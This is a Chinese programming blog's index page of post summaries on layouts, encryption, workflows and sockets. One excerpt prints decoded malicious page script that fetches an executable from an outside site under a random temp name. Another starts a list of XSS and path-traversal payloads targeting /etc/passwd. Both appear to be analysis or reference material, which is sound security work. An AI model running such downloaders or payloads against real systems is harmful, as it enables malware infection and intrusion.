摘要:
[代码]http://files.cnblogs.com/evlon/EvlonTab.rar 阅读全文
摘要:
三行两列DIV布局之左固定宽度 阅读全文
摘要:
没有想到,上个随笔的代码在POS机上出错,查了半天,如果去掉malloc和free,就没有事了。
所以,把现在的不用动态内存分配的算法记录下
阅读全文
摘要:
C#与C程序通讯时,为了数据安全,要对数据进行DES_cbc_pkcs7加密,这是C的实现
阅读全文
摘要:
建立步骤如下:
一. 建立一个 State Machine Workflow Library ,命名为StateLib. 完成后,修改文件WorkFlow1为WF_Login
二. 在里面通过设计器,加入下面的工作流(具体如何设计,不再说明),最终结果如图:
三. 把工作流发布成WebService,VS2005会自动命名为:StateLib_WebService
四. 添加一个新WebSite项目,命名WorkflowSite. 在Default.aspx中添加输入框,以及按钮
五. 编写事件,测试一下 阅读全文
摘要:
public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { ... 阅读全文
摘要:
// CppSocket.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include #include #include #include #include #include #include using namespace std;#define MS_SOCKET 1#ifdef... 阅读全文
摘要:
文件: http://xxxx.xxx.xxx/web.htm 通过解码后: function gn(n) { var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; } try { var mm1="http:";mm2="//";mm3="www.55dj.net/xy.exe";dl=mm1+mm2+mm... 阅读全文
摘要:
> ='> %3Cscript%3Ealert('XSS')%3C/script%3E %0a%0a.jsp %22%3cscript%3ealert(%22xss%22)%3c/script%3e %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/w... 阅读全文